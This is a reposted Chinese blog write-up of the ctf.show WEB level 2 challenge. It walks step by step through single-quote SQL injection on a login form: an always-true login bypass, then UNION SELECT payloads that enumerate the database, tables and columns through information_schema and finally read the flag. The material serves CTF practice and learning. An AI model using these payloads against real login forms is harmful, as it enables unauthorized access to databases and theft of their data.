ctfshow-WEB-web2
生活随笔
收集整理的這篇文章主要介紹了
ctfshow-WEB-web2
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
ctf.show WEB模塊第2關是一個SQL注入漏洞,請求方式是POST請求,注入點是單引號字符型注入,flag就藏在當前的數據庫的flag表中,使用聯合注入獲取數據即可
?
?
在用戶名的輸入框中輸入萬能賬號?a' or true #,密碼隨便輸
?登錄成功,萬能賬號生效了,并且把查詢到的用戶名顯示到了頁面中,既然有顯示位,那我們就用聯合注入進行脫庫
?
首先,測試一下回顯的位置,在用戶名的輸入框中輸入一下payload,密碼還是隨便輸
a' union select 1,2,3 #?
?
接下來,我們修改payload中2的位置,就可以將數據回顯到頁面中了,下面獲取當前使用的數據庫,盲猜flag就藏在當前使用的數據庫中
a' union select 1,database(),3 #?
數據庫有了,接下來是脫表,在用戶名的輸入框中輸入一下payload,密碼還是隨便輸
a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='web2') ,3 #?
接下來獲取flag表的字段
a' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag') ,3 #?
接下來獲取flag表的數據
a' union select 1,(select flag from flag),3 #將flag的內容整體復制到輸入框中即可過關?
總結
以上是生活随笔為你收集整理的ctfshow-WEB-web2的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: VA 破解版
- 下一篇: 比特大陆算法移植过程(详细)